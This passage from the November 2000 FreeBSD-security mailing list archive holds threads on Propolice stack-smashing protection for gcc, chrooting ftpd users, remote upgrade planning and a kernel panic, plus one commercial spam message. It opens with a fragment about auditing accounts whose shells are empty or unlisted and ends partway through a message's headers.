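Run against the sample data it flags rossen (empty field, effective /bin/sh), and daemon and carlos (shells not in the list). The empty-field case is the one worth hunting for: it looks like a disabled account in /etc/passwd but logs in with a full Bourne shell, and nothing in /etc/shells will stop it.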
From: Mike Silbersack To: Andreas Alderud Cc: security@FreeBSD.ORG Subject: Re: FYI: Propolice for gcc-2.95.2 In-Reply-To: <002501c04fd9$cc305130$8e00a8c0@XGod> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
On Thu, 16 Nov 2000, Andreas Alderud wrote: > Kris Kennaway wrote: > >Very cool..It would be useful to look at the feasibility of > >integrating this into FreeBSD as an option. > > Probably a good idea for 4.x series, but hardly needed in 5.x since > TrustedBSD gets integrated into it. > Release Candidate 1 of 4.2 is already released, no hope of seeing it in the > final 4.2 release, or? > > /Kind regards, > David A. Alderud
MAC and stack-smashing protection are certainly not mutually exclusive. Even if the base system is configured with strong access barriers to compromised programs, there is still lesser mischief that can be performed. Additionally, it's very likely that people will still install wu-ftpd, qpopper, imapd, etc from ports. None of trustedbsd's features will help when confronted with the default behavior of these programs. Stack protection, on the other hand, would have prevented a good amount of the past bugs in these programs, and will likely continue to be a good protection method. Personally, I'd like to see _both_ options be used to their full potential. Mike "Silby" Silbersack
From owner-freebsd-security Thu Nov 16 9:25:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id AFD0F37B4C5; Thu, 16 Nov 2000 09:25:36 -0800 (PST) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id JAA08006; Thu, 16 Nov 2000 09:25:26 -0800 (PST) (envelope-from freebsd)
From: "Rodney W. Grimes" Message-Id: <200011161725.JAA08006@gndrsh.dnsmgr.net> Subject: Re: problem using sysinstall In-Reply-To: from James Wyatt at "Nov 15, 2000 07:47:26 pm" To: jwyatt@rwsystems.net (James Wyatt) Date: Thu, 16 Nov 2000 09:25:25 -0800 (PST) Cc: kris@FreeBSD.ORG (Kris Kennaway), str@giganda.komkon.org (Igor Roshchin), rraykov@sageian.com, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
> On Wed, 15 Nov 2000, Kris Kennaway wrote: > > On Wed, Nov 15, 2000 at 04:48:39PM -0500, Igor Roshchin wrote: > > > Well, although we all understand what is "The Good Thing", > > > the reality of life makes us to do some compromises. > > > I believe, several (I would even say `many' ) > > > people on this list have done upgrades > > > (either via "make world" or via sysinstall) a) remotely > > > > Many people like to jump out of planes for thrills, too :-) > > Yes, but they receive a *lot* of warnings before they do, they see others > do it and live. Then, of course, they have a parachute too... (^_^)
Actually we have 2 parachutes, just in case. And like in the remote upgrade situation one should always have a secondary plan of action in case things go wrong. Thank god for skydivers this secondary plan is clearly laid out, for the remote upgrader it is not always so clear. Sometimes a ``Okay, if it blows chunks I get in the car and go to the remote and fix it.'' is a fine backup plan (usually when the car trip is under the allowable down time for the system.) Other times this is not practical and more careful planning needs to be done, ie travel cross country via commercial airline to fix a system.
> What about not letting a bin extract *overwrite* files? (I know there is > work for that and I haven't offered to do it, but I'm asking to consider > it.)
> When doing an install from scratch, the mkfs has been run, so the > filesystem is clean. I don't know what to do for binaries for upgrades, > but the current approach doesn't work for that either, right?
If you don't overwrite files you didn't do an upgrade. :-)
> If I'm off-base, say so and I'll crawl back into the machine room - Jy@
You're not totally off base in your concerns, but I think you're directing them in the wrong direction. Any upgrade should be carefully planned, and to draw some more ``jumping'' related analogies a local upgrade is more like the everyday skydive, and a remote upgrade of a critical system is more like a BASE jump. I don't do a whole lot of planning out at the airfield when banging out a half dozen skydives, I spend 15 minutes packing my main canopy and count on my reserve should I have a problem with it. When doing a BASE jump I'll spend a good hour looking at exit points, landing area, where the cops might be coming from, escape routes, etc. It takes me an hour or two to pack the one and only canopy that _MUST_ save my life. When doing a remote critical upgrade one should take similar precautions, if possible do a little skydiving by upgrading similar systems that are local to you so that you can catch potential pitfalls before you create a critical problem for yourself.
-- Rod Grimes - KD7CAX @ CN85sl - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 15:32:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id D24EE37B479 for ; Thu, 16 Nov 2000 15:32:50 -0800 (PST) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id eAGNWnQ02628; Thu, 16 Nov 2000 16:32:49 -0700 (MST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id QAA69958; Thu, 16 Nov 2000 16:32:48 -0700 (MST) Message-Id: <200011162332.QAA69958@harmony.village.org> To: Mike Silbersack Subject: Re: FYI: Propolice for gcc-2.95.2 Cc: KOJIMA Hajime , security@FreeBSD.ORG In-reply-to: Your message of "Wed, 15 Nov 2000 23:10:22 CST." References: Date: Thu, 16 Nov 2000 16:32:48 -0700 
From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Mike Silbersack writes: : One thing I'm unclear on is how propolice affects compatibility between : modules. Can I use a libc compiled without propolice and an app compiled : with it, or vice versa? It would appear that is the case given that there's a command line option to turn it on and off on a per module basis. Some of the protections look interesting, but some of them won't help too much. Every little bit helps. I'd worry about putting this into the base system. First, I'd worry about the performance impact of all this extra code in the base system. Second, I'd worry about bitrot when we move to new versions of the source. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 16:49:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.hobbydump.com (mail.hobbydump.com [64.46.30.3]) by hub.freebsd.org (Postfix) with SMTP id 6777537B479 for ; Thu, 16 Nov 2000 16:49:30 -0800 (PST) Received: (qmail 76377 invoked by uid 1006); 17 Nov 2000 00:53:48 -0000 Date: Thu, 16 Nov 2000 17:53:48 -0700 
From: Sheldon Jones To: freebsd-security@freebsd.org Subject: chroot and ftpd Message-ID: <20001116175348.A76193@hobbydump.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
Does anyone know of a way to have the chroot function in ftpd lock a user into a sub-directory under their user directory? I would like a way to keep the users in a sub-directory under their root dir. Ncftpd has this feature but I really like the ftpd that comes with freebsd. In ncftpd you use (u-restrict-mode=subdir-of-homedir userfiles); this will restrict the user to the sub-directory userfiles under their account. Thank you for your time, Sheldon Jones iHighway.net
From owner-freebsd-security Thu Nov 16 16:53:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id C61B737B479 for ; Thu, 16 Nov 2000 16:53:42 -0800 (PST) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id eAH0rfI21668; Thu, 16 Nov 2000 16:53:41 -0800 (PST) Date: Thu, 16 Nov 2000 16:53:41 -0800
From: Alfred Perlstein To: Sheldon Jones Cc: freebsd-security@FreeBSD.ORG Subject: Re: chroot and ftpd Message-ID: <20001116165340.G18037@fw.wintelcom.net> References: <20001116175348.A76193@hobbydump.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001116175348.A76193@hobbydump.com>; from freebsd@hobbydump.com on Thu, Nov 16, 2000 at 05:53:48PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Sheldon Jones [001116 16:49] wrote: > Does anyone know of a way to have the chroot function in ftpd lock a user into > a sub-directory under their user directory. I would like a way to keep the > users in a sub-directory under their root dir. Not afaik, but patches for this functionality would probably be accepted. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 16:59:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 755CE37B479 for ; Thu, 16 Nov 2000 16:59:54 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAH10gl58527; Thu, 16 Nov 2000 17:00:42 -0800 (PST) (envelope-from kris) Date: Thu, 16 Nov 2000 17:00:42 -0800 
From: Kris Kennaway To: Warner Losh Cc: Mike Silbersack , KOJIMA Hajime , security@FreeBSD.ORG Subject: Re: FYI: Propolice for gcc-2.95.2 Message-ID: <20001116170042.A58481@citusc17.usc.edu> References: <200011162332.QAA69958@harmony.village.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="liOOAslEiF7prFVr" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200011162332.QAA69958@harmony.village.org>; from imp@village.org on Thu, Nov 16, 2000 at 04:32:48PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --liOOAslEiF7prFVr Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Thu, Nov 16, 2000 at 04:32:48PM -0700, Warner Losh wrote: > I'd worry about putting this into the base system. First, I'd worry > about the performance impact of all this extra code in the base > system. Second, I'd worry about bitrot when we move to new versions > of the source. Performance shouldn't be an issue unless you enable the extra bounds checking at compile time. Bitrot is certainly an issue, though. We should at least allow world to be built using a propolice-enabled compiler - though that should be fairly automatic just using CC and CFLAGS. 
Kris --liOOAslEiF7prFVr Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoUgzoACgkQWry0BWjoQKUOZgCg1a/m1kjZlh3p+ElJU0oF2EXn 6h4AoNj6VxOjHPjV+4qpr5yhjcxeTR6j =lDTp -----END PGP SIGNATURE----- --liOOAslEiF7prFVr-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 17: 8:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id ADD4A37B479; Thu, 16 Nov 2000 17:08:37 -0800 (PST) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id eAH18aQ02980; Thu, 16 Nov 2000 18:08:36 -0700 (MST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id SAA70664; Thu, 16 Nov 2000 18:08:35 -0700 (MST) Message-Id: <200011170108.SAA70664@harmony.village.org> To: Kris Kennaway Subject: Re: FYI: Propolice for gcc-2.95.2 Cc: Mike Silbersack , KOJIMA Hajime , security@FreeBSD.ORG In-reply-to: Your message of "Thu, 16 Nov 2000 17:00:42 PST." <20001116170042.A58481@citusc17.usc.edu> References: <20001116170042.A58481@citusc17.usc.edu> <200011162332.QAA69958@harmony.village.org> Date: Thu, 16 Nov 2000 18:08:35 -0700 
From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20001116170042.A58481@citusc17.usc.edu> Kris Kennaway writes: : > I'd worry about putting this into the base system. First, I'd worry : > about the performance impact of all this extra code in the base : > system. Second, I'd worry about bitrot when we move to new versions : > of the source. : : Performance shouldn't be an issue unless you enable the extra bounds : checking at compile time. Right. I guess I'd worry about this being enabled by default as a way of "solving" all stack smashing problems. If it is just a knob to enable for those that want to enable it, I'd be cool with that. : Bitrot is certainly an issue, though. We should at least allow world : to be built using a propolice-enabled compiler - though that should be : fairly automatic just using CC and CFLAGS. My concern would be if we put this into the 2.95.2 tree that we have. I'd have no problems with making this "easy" to enable. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 17:54:55 2000 Delivered-To: freebsd-security@freebsd.org Received: from blues.jpj.net (blues.jpj.net [204.97.17.146]) by hub.freebsd.org (Postfix) with ESMTP id 80A4837B479 for ; Thu, 16 Nov 2000 17:54:52 -0800 (PST) Received: from localhost (trevor@localhost) by blues.jpj.net (right/backatcha) with ESMTP id eAH1sln12127; Thu, 16 Nov 2000 20:54:47 -0500 (EST) Date: Thu, 16 Nov 2000 20:54:47 -0500 (EST) 
From: Trevor Johnson To: KOJIMA Hajime Cc: security@FreeBSD.ORG Subject: Re: FYI: Propolice for gcc-2.95.2 In-Reply-To: <46896.974343158@ideon.st.ryukoku.ac.jp> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > FYI: "Propolice", GCC extension for protecting applications from > stack-smashing attacks, for gcc-2.95.2 is now available. > > At ftp://dse.doc.ic.ac.uk/pub/misc/bcc/ there is another set of patches that add bounds-checking to GCC, but unfortunately the newest is for GCC 2.7.2. -- Trevor Johnson http://jpj.net/~trevor/gpgkey.txt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Nov 16 18: 0: 2 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 80A6837B479 for ; Thu, 16 Nov 2000 17:59:57 -0800 (PST) Received: (qmail 63373 invoked by uid 1000); 17 Nov 2000 01:59:56 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 17 Nov 2000 01:59:56 -0000 Date: Thu, 16 Nov 2000 19:59:56 -0600 (CST) 
From: Mike Silbersack To: Warner Losh Cc: Kris Kennaway , KOJIMA Hajime , security@FreeBSD.ORG Subject: Re: FYI: Propolice for gcc-2.95.2 In-Reply-To: <200011170108.SAA70664@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
On Thu, 16 Nov 2000, Warner Losh wrote: > In message <20001116170042.A58481@citusc17.usc.edu> Kris Kennaway writes: > : > I'd worry about putting this into the base system. First, I'd worry > : > about the performance impact of all this extra code in the base > : > system. Second, I'd worry about bitrot when we move to new versions > : > of the source. > : > : Performance shouldn't be an issue unless you enable the extra bounds > : checking at compile time. > > Right. I guess I'd worry about this being enabled by default as a way > of "solving" all stack smashing problems. If it is just a knob to > enable for those that want to enable it, I'd be cool with that.
On the contrary, if the support is imported, it should be enabled by default. The simple fact is that those most likely to install badly written software are also probably unaware of how to change the options and rebuild world / ports. Additionally, a default on configuration would allow the distinction of being able to say that FreeBSD is not vulnerable when a certain normally vulnerable port is installed, where other OSes are vulnerable. Of course, that's assuming two things:
1. Propolice actually stops some attacks. While it looks great in theory, it doesn't sound like any commonly exploited apps have been tested for resilience with propolice compilation.
2. Propolice doesn't break anything. With the number of ports, this sounds like it could be extremely hard to figure out. However, if they've successfully recompiled redhat with it, it can't break that many programs.
Obviously the kernel wouldn't be compiled with Propolice ever.
A compilation of world with it would be nice in theory, but would certainly raise claims of slowdown. Perhaps apps could be selectively added|removed from the list of protected apps in the base system based on their suid status and auditness? Ports are really where the security's going to be an issue, as will the speed... I'd think propolice should be on there by default. Experienced users concerned with apache running as fast as possible can use flags to cause its protections not to be used when compiling. I guess the argument is analogous to disabling telnet by default. (Note that after saying that, I haven't tried the patches whatsoever, I don't want to break gcc. Could some compiler expert tell us if it works cleanly on FreeBSD?) Mike "Silby" Silbersack
From owner-freebsd-security Thu Nov 16 18:24: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id 6FF1037B479; Thu, 16 Nov 2000 18:24:02 -0800 (PST) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id eAH2O1Q03206; Thu, 16 Nov 2000 19:24:01 -0700 (MST) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id TAA71161; Thu, 16 Nov 2000 19:24:00 -0700 (MST) Message-Id: <200011170224.TAA71161@harmony.village.org> To: Mike Silbersack Subject: Re: FYI: Propolice for gcc-2.95.2 Cc: Kris Kennaway , KOJIMA Hajime , security@FreeBSD.ORG In-reply-to: Your message of "Thu, 16 Nov 2000 19:59:56 CST." References: Date: Thu, 16 Nov 2000 19:24:00 -0700
From: Warner Losh
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message Mike Silbersack writes:
: 1. Propolice actually stops some attacks. While it looks great in
: theory, it doesn't sound like any commonly exploited apps have been tested
: for resilience with propolice compilation.

I wouldn't want to give our users a false sense of security thinking that all stack smashing attacks could be stopped by these patches. There are an interesting number of theoretical attacks that I've read about that it doesn't stop.

: 2. Propolice doesn't break anything. With the number of ports, this
: sounds like it could be extremely hard to figure out. However, if they've
: successfully recompiled redhat with it, it can't break that many programs.

That we know of.

: Obviously the kernel wouldn't be compiled with Propolice ever. A
: compilation of world with it would be nice in theory, but would certainly
: raise claims of slowdown. Perhaps apps could be selectively added|removed
: from the list of protected apps in the base system based on their suid
: status and auditness?

Enabling it for setuid programs would be reasonable, assuming that it didn't break them or introduce an unacceptable overhead. However, there have been attacks against shell scripts running at elevated privs where buffer overflows in unprivileged programs were used to get a foot in the door. These are in the class of cgi attacks, typically, and "shell" is used here very generically.

: Ports are really where the security's going to be an issue, as will the
: speed... I'd think propolice should be on there by default. Experienced
: users concerned with apache running as fast as possible can use flags to
: cause its protections not to be used when compiling.

We'd need to install two libc's if we did this. We'd need to install a shared libc with this enabled and one without it enabled if we would try to split the baby.
But this might be as simple as installing them in separate directories. Of course this would negatively impact worldstone bragging rights for those that have a sub-half-hour buildworld time now :-)

I'm sure that there are other issues involved. Talk of enabling it by default is premature until someone makes the effort to port it to FreeBSD's tree, get it integrated and do real-world performance measurement.

Warner

From owner-freebsd-security Thu Nov 16 18:57:26 2000
Delivered-To: freebsd-security@freebsd.org
Received: from smtp.163.com (unknown [202.108.44.212]) by hub.freebsd.org (Postfix) with ESMTP id DDA4137B4C5 for ; Thu, 16 Nov 2000 18:57:18 -0800 (PST)
Received: from localhost (unknown [61.142.250.35]) by smtp.163.com (Postfix) with ESMTP id CD1601C989D39 for ; Fri, 17 Nov 2000 11:03:07 +0800 (CST)
X-Sender: bea2@netease.com
From: Pan
To: FreeBSD-security@FreeBSD.org
Date: Fri, 17 Nov 2000 11:01:53 +0800
Subject: aluminium extrusion
Reply-To: nhjinxiecheng@sina.com.cn
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Message-Id: <20001117030307.CD1601C989D39@smtp.163.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Dear Sir or Madam,

JinXieCheng Aluminum Manufacturing Co. Ltd., GuangDong is an enterprise specializing in producing electrophoresis paintings aluminium extrusion for architecture and industrial profiles. Its products include: curtain wall material, casement window, sliding window, door material, piping material, window, door material, piping material, decorative cabinet material and industrial profiles. It has successfully passed the recognition of ISO9002 quality system certification. We have invested a huge sum of capital to import a full set of specialized production equipment from Korea and have been in a technical partnership with Korean DOIL INDUSTRIAL TECHNOLOGIES CO., LTD., whose electrophoresis paintings technology was peer to the well known Japanese HONNYLITE. Since then, a chain of drawbacks has been rectified; the color of aluminum profiles is no longer monotonous. Paintings don't easily come off or fade. At present, we are planning to export our products to the international market; if you are interested in our products, please feel free to contact us.

Looking forward to your reply.

Thanks and best regards,

Jin Xiecheng
JinXieCheng Aluminum Manufacturing Co., Ltd.
E-mail: nhjinxiecheng@sina.com.cn
http://www.jinxiecheng.com
Contact Person: Ms Pan

From owner-freebsd-security Thu Nov 16 19:12:38 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 161F037B479 for ; Thu, 16 Nov 2000 19:12:36 -0800 (PST)
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id WAA18894; Thu, 16 Nov 2000 22:15:05 -0500 (EST) (envelope-from rjh@mohawk.net)
Date: Thu, 16 Nov 2000 22:15:05 -0500 (EST)
From: Ralph Huntington
To: Sheldon Jones
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: chroot and ftpd
In-Reply-To: <20001116175348.A76193@hobbydump.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

proftpd may be able to do this as well. It's _highly_ configurable.

http://www.proftpd.net/

On Thu, 16 Nov 2000, Sheldon Jones wrote:

> Does anyone know of a way to have the chroot function in ftpd lock a user into
> a sub-directory under their user directory. I would like a way to keep the
> users in a sub-directory under their root dir.
>
> Ncftpd has this feature but I really like the ftpd that comes with freebsd.
> In ncftpd you use (u-restrict-mode=subdir-of-homedir userfiles) this will
> restrict the user to the sub-directory userfiles under their account.
>
> Thank you for your time,
> Sheldon Jones
> iHighway.net

From owner-freebsd-security Thu Nov 16 19:30:54 2000
Delivered-To: freebsd-security@freebsd.org
Received: from galileo.stargate.org (c552033-a.spokn1.wa.home.com [24.20.116.105]) by hub.freebsd.org (Postfix) with ESMTP id 4E86E37B479 for ; Thu, 16 Nov 2000 19:30:52 -0800 (PST)
Received: from BLACKBOX (blackbox.ted.net [192.168.0.9]) by galileo.stargate.org (8.11.0/8.11.0) with SMTP id eAH4P0t30866; Thu, 16 Nov 2000 20:25:01 -0800
Message-ID: <001601c05044$6ceaf6b0$0900a8c0@BLACKBOX>
From: "T.D. Brace"
To: "Ralph Huntington", "Sheldon Jones"
Cc:
References:
Subject: Re: chroot and ftpd
Date: Thu, 16 Nov 2000 19:13:57 -0800
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Yes it will, and has the ability to do it based on group as well. Be sure to cvsup, not use the 1.2.0rc2 that's linked in their site. Nice feature in there is limiting download speed.

----- Original Message -----
From: "Ralph Huntington"
To: "Sheldon Jones"
Cc:
Sent: Thursday, November 16, 2000 7:15 PM
Subject: Re: chroot and ftpd

> proftpd may be able to do this as well. It's _highly_ configurable.
>
> http://www.proftpd.net/
>
> On Thu, 16 Nov 2000, Sheldon Jones wrote:
>
> > Does anyone know of a way to have the chroot function in ftpd lock a user into
> > a sub-directory under their user directory. I would like a way to keep the
> > users in a sub-directory under their root dir.
> >
> > Ncftpd has this feature but I really like the ftpd that comes with freebsd.
> > In ncftpd you use (u-restrict-mode=subdir-of-homedir userfiles) this will
> > restrict the user to the sub-directory userfiles under their account.
> >
> > Thank you for your time,
> > Sheldon Jones
> > iHighway.net

From owner-freebsd-security Thu Nov 16 21:19:19 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.stikom-sby.ac.id (ns1.stikom-sby.ac.id [202.155.19.2]) by hub.freebsd.org (Postfix) with SMTP id 4376D37B479 for ; Thu, 16 Nov 2000 21:19:13 -0800 (PST)
Received: from omicron.stikom.edu (omicron.stikom.edu [202.155.19.12]) by ns1.stikom-sby.ac.id (NTMail 3.02.13) with ESMTP id oa221014 for ; Fri, 17 Nov 2000 12:26:14 +0700
Message-ID: <002201c05055$e3091780$080419ac@teknologi>
From: "Tekman"
To:
References:
Subject: Kernel Panic
Date: Fri, 17 Nov 2000 12:18:53 +0700
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I compiled my kernel, and I rebooted my FreeBSD. And I find kernel panic: CPU Not Configure.

My computer is an Intel Pentium 75 MHz, RAM 16 MByte. I am trying to make my computer an ipfirewall for studying.

What's wrong with my kernel?

Thanks in advance

regards

tekman

From owner-freebsd-security Thu Nov 16 21:21:06 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mr2.ipartners.pl (mr2.ipartners.pl [157.25.5.19]) by hub.freebsd.org (Postfix) with ESMTP id 5AB9B37B479 for ; Thu, 16 Nov 2000 21:21:03 -0800 (PST)
Received: from weblab.pl ([195.94.193.62]) by mr2.ipartners.pl (8.9.3/8.9.1/MR1.0) with ESMTP id GAA97718; Fri, 17 Nov 2000 06:20:59 +0100 (CET) (envelope-from gorg@weblab.pl)
Message-ID: <3A14C238.19C7C60C@weblab.pl>
Date: Fri, 17 Nov 2000 06:29:28 +0100
From: Marcin Krasowski
X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.14-5.0 i686)
X-Accept-Language: pl, en
MIME-Version: 1.0
To: Sheldon Jones
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: chroot and ftpd
References: <20001116175348.A76193@hobbydump.com>
Content-Type: text/plain; charset=iso-8859-2
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Sheldon Jones wrote:
>
> Does anyone know of a way to have the chroot function in ftpd lock a user into
> a sub-directory under their user directory. I would like a way to keep the
> users in a sub-directory under their root dir.
>
> Ncftpd has this feature but I really like the ftpd that comes with freebsd.
> In ncftpd you use (u-restrict-mode=subdir-of-homedir userfiles) this will
> restrict the user to the sub-directory userfiles under their account.
>
> Thank you for your time,
> Sheldon Jones
> iHighway.net

Just put the name of the user into the /etc/ftpchroot file (create it if you don't have one). There is a problem with reading usernames while doing ls, which comes from the absence of /etc/passwd and /etc/group in the chrooted environment (I hope you've already guessed how to fix it :) but the rest is fully functional.

Gorg

PS. Hello to the group.
It's my first posting here.

From owner-freebsd-security Thu Nov 16 21:25:54 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mr2.ipartners.pl (mr2.ipartners.pl [157.25.5.19]) by hub.freebsd.org (Postfix) with ESMTP id C871737B479 for ; Thu, 16 Nov 2000 21:25:49 -0800 (PST)
Received: from weblab.pl ([195.94.193.62]) by mr2.ipartners.pl (8.9.3/8.9.1/MR1.0) with ESMTP id GAA97762; Fri, 17 Nov 2000 06:25:28 +0100 (CET) (envelope-from gorg@weblab.pl)
Message-ID: <3A14C345.7112BC81@weblab.pl>
Date: Fri, 17 Nov 2000 06:33:57 +0100
From: Marcin Krasowski
X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.14-5.0 i686)
X-Accept-Language: pl, en
MIME-Version: 1.0
To: Tekman
Cc: security@FreeBSD.ORG
Subject: Re: Kernel Panic
References: <002201c05055$e3091780$080419ac@teknologi>
Content-Type: text/plain; charset=iso-8859-2
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Tekman wrote:
>
> I was compile my kernel, and i reboot my FreeBSD. And i find kernel panic:
> CPU Not Configure.
>
> My Computer is Intel Pentium 75 MHz, Ram 16 MByte. I tru to make my komputer
> ipfirewall for studing.
>
> What's wrong with my kernel ?
>
> Thank's in advanced
>
> regard's
>
> tekman

Are you sure you have the following line enabled in the kernel config file?

cpu I586_CPU

Gorg

PS. Is it really a security question? This list seems to be more 'questionable' every day.

From owner-freebsd-security Thu Nov 16 21:28:57 2000
Delivered-To: freebsd-security@freebsd.org
Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id F2A1037B479 for ; Thu, 16 Nov 2000 21:28:53 -0800 (PST)
Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAH5OrX62507; Thu, 16 Nov 2000 21:24:53 -0800 (PST) (envelope-from kris)
Date: Thu, 16 Nov 2000 21:24:53 -0800
From: Kris Kennaway
To: Tekman
Cc: security@FreeBSD.ORG
Subject: Re: Kernel Panic
Message-ID: <20001116212453.A62485@citusc17.usc.edu>
References: <002201c05055$e3091780$080419ac@teknologi>
Mime-Version: 1.0
